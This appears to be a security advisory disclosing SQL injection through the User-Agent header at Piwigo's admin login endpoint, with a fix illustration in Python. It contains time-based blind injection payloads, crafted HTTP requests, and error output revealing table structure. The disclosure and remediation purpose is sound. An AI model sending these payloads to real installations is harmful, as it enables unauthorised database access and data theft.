Summary
There is SQL Injection in the login of the administrator screen.
Details
The SQL statement that stores the HTTP header "User-Agent" is vulnerable at the endpoint that records user activity when logging in to the administrator screen.
It is possible to execute arbitrary SQL statements.
PoC
- Access the admin login page.
- Log in with the correct information as a user who can log in to the administrator screen.
- Insert the SQL Payload into the HTTP header "User-Agent" of the login request and send the request.
- Any inserted SQL statement can be executed.
Target
- Endpoint:
/identification.php
- Parameter (header):
User-Agent
Required Permissions
Users who can log in to the administrator screen (even with low privileges).
PoC Test
- Payload:
1))%20or%20sleep(5)--
- Payload:
1))%20or%20sleep(10)--
- Payload:
1))%20or%20sleep(20)--
Request Example
Admin screen login request
POST /<Path>/identification.php HTTP/1.1
...
User-Agent: 1))%20or%20sleep(20)--
...
username=admin&password=pass&redirect=%252F<Path>%252Fadmin.php&login=%E9%80%81%E4%BF%A1
Other
You can also see that the table name (piwi_activity) is output in the error message by inserting a string that breaks the SQL statement.
POST /<Path>/identification.php HTTP/1.1
...
User-Agent: '">{{7*7}}${2*2}
...
username=admin&password=pass&redirect=%252F<Path>%252Fadmin.php&login=%E9%80%81%E4%BF%A1
HTTP/1.1 200 OK
...
Warning: [mysql error 1064] You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '">{{7*7}}${2*2}')' at line 3
INSERT INTO `piwi_activity`
(`object`,`object_id`,`action`,`performed_by`,`session_idx`,`ip_address`,`details`,`user_agent`)
VALUES('user','1','login','1','4ad3723e62d223928188721376fc01b3','<Private IP address>','a:1:{s:6:\"script\";s:14:\"identification\";}',''">{{7*7}}${2*2}') in /home/soft/public_html/<Path>/include/dblayer/functions_mysqli.inc.php on line 847
...
Screen showing execution results
/admin.php?page=user_activity
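The error output above is the symptom of the value being spliced into the SQL text. The following added example (not Piwigo's code) reproduces that behaviour against a throwaway in-memory SQLite table with the same column names as the advisory's INSERT: a hypothetical `mass_inserts_unsafe` builds the statement by string concatenation, so the quote-breaking User-Agent from the report turns into a syntax error, while `mass_inserts_safe` binds every value as a parameter and stores the same string verbatim. Parameter binding is how the "escape the parameter contents" measure is realised here; the table name, field list and sample User-Agent values are constructed for the example.

```python
import sqlite3

# Constructed sample values. MALFORMED_UA is the quote-breaking string shown in the
# advisory's error output; it is not an exploit, it only contains an unbalanced quote.
NORMAL_UA = "Mozilla/5.0 (X11; Linux x86_64)"
MALFORMED_UA = "'\">{{7*7}}${2*2}"

# Hypothetical stand-in for the activity table; column names mirror the advisory's INSERT.
SCHEMA = ("CREATE TABLE activity ("
          "object TEXT, object_id TEXT, action TEXT, user_agent TEXT)")


def mass_inserts_unsafe(conn, table, fields, row):
    """Builds the INSERT by splicing each value into the SQL text, the pattern the
    advisory describes. Any quote inside a value changes the statement itself."""
    cols = ",".join("`%s`" % f for f in fields)
    vals = ",".join("'%s'" % row[f] for f in fields)
    conn.execute("INSERT INTO `%s` (%s) VALUES (%s)" % (table, cols, vals))


def mass_inserts_safe(conn, table, fields, row):
    """Same insert with every value bound as a parameter. Table and column names still
    come from code, never from the request; only the values are user-controlled."""
    cols = ",".join("`%s`" % f for f in fields)
    placeholders = ",".join("?" for _ in fields)
    conn.execute("INSERT INTO `%s` (%s) VALUES (%s)" % (table, cols, placeholders),
                 tuple(row[f] for f in fields))


def record_login(insert_fn, user_agent):
    """Runs one login-activity insert against a fresh in-memory database and returns
    ('error', message) when the SQL breaks, or ('ok', stored_value) when it succeeds."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    fields = ("object", "object_id", "action", "user_agent")
    row = {"object": "user", "object_id": "1", "action": "login", "user_agent": user_agent}
    try:
        insert_fn(conn, "activity", fields, row)
    except sqlite3.Error as exc:
        return ("error", str(exc))
    stored = conn.execute("SELECT user_agent FROM activity").fetchone()[0]
    return ("ok", stored)


if __name__ == "__main__":
    for name, fn in (("unsafe", mass_inserts_unsafe), ("safe", mass_inserts_safe)):
        for ua in (NORMAL_UA, MALFORMED_UA):
            print(name, repr(ua), "->", record_login(fn, ua))
```

The unsafe variant only fails loudly because the constructed value is malformed; a well-formed value that closes the quote would be accepted silently, which is why the fix must be applied to the insert routine rather than to the error handling.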
Impact
Any SQL statement can be executed.
Doing so may leak information in the database.
Cause
Where the user-controlled value is inserted (Piwigo/include/functions.inc.php, line 621 in c01ec38):
'user_agent' => $user_agent,
Where the data inserted by the user is executed as-is by SQL (Piwigo/include/dblayer/functions_mysqli.inc.php, line 491 in c01ec38):
function mass_inserts($table_name, $dbfields, $datas, $options=array())
Measures
If a SQL statement is executed verbatim with user-controllable parameters, be sure to escape the parameter contents appropriately.
Reference